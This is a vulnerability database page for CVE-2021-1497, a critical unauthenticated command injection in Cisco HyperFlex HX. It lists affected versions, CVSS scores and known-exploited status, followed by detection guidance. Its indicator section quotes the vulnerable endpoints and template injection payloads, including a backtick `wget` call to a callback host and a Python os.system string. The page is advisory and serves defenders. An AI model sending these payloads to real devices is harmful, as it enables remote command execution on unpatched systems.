cbcvebase.
CVE-2021-1497
published 2021-05-06

CVE-2021-1497: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command…

PriorityP198critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2021-11-17
Exploited in the wild
EPSS
99.93%
100.0th percentile
Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.

Affected

4 ranges
VendorProductVersion rangeFixed in
ciscocisco_hyperflex_hx_data_platform
ciscohyperflex_hx
ciscohyperflex_hx_data_platform< 4.0\(2e\)4.0\(2e\)
ciscohyperflex_hx_data_platform>= 4.5 < 4.5\(2a\)4.5\(2a\)

Detection & IOCsextracted from sources · hover to see the quote

url/auth/change
url/auth
url/storfs-asup
commandusername=root&password={{url_encode(payload)}}
commandaction=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`
command123",""$6$$)); import os;os.system("{{cmd}}");print(crypt.crypt("
  • Monitor for POST requests to /storfs-asup with backtick command substitution in the token or mode parameters (e.g., token=`wget ...` or mode=`wget ...`).
  • The /storfs-asup endpoint is exploited to execute shell commands as the Tomcat user; alert on unauthenticated POST requests to this path.
  • CVE-2021-1497 is a KEV (Known Exploited Vulnerability); prioritize detection and patching on internet-facing Cisco HyperFlex HX management interfaces.
  • ·The injection payload uses Python crypt/os.system, indicating the vulnerable endpoint processes Python code server-side; detection rules should account for URL-encoded variants of the payload.
  • ·No authentication is required to exploit these vulnerabilities; perimeter controls blocking unauthenticated access to the management interface are the primary mitigation until patching.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_cisco9.8CRITICAL
vendor_redhat5.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.